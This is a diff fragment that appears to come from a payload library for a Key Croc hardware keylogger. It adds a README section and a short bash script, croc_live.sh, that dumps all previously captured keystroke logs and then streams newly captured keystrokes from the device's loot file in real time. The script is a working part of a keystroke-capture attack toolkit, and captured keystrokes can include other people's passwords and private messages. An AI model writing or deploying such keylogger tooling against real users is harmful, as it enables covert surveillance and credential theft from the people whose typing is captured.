shown to inform users that live keystrokes will be displayed. + - The script uses the tail -f command, which continuously follows and outputs new content appended to the "loot/croc_char.log" file. This effectively presents live keystrokes in real-time. + +- Usage: + +Place the croc_live.sh file in keycroc tools folder. + +To utilize this script, simply execute it in the terminal environment. Make sure that the required log files, specifically "croc_char.log" and "loot/croc_char.log," are available and accessible within the current directory. Simply type "bash udisk/tools/croc_live.sh" in terminal. + +Please note that this script may have specific use cases, such as monitoring and capturing keyboard activity during specific sessions or tasks. Always ensure you have the necessary permissions to read and access the log files being monitored. diff --git a/payloads/library/general/Croc_Live/croc_live.sh b/payloads/library/general/Croc_Live/croc_live.sh new file mode 100644 index 0000000..6a0a14c --- /dev/null +++ b/payloads/library/general/Croc_Live/croc_live.sh @@ -0,0 +1,19 @@ +#!/bin/bash + +# Title: Croc_Live +# Description: Live keystrokes in real-time. It operates in the terminal environment ( bash udisk/tools/croc_live.sh ) +# Author: spywill +# Version: 1.0 +# Category: Key Croc + +echo -ne "\n\nPrevious keystrokes:\n\n" +find . -type f -name "croc_char.log" -exec cat {} + + +until [ -f loot/croc_char.log ]; do + echo -ne "Waiting for keyboard activity\033[0K\r" +done +sleep 1 +printf '\033[H\033[2J' + +echo -ne "\n\nLive keystrokes:\n\n" +tail -f loot/croc_char.log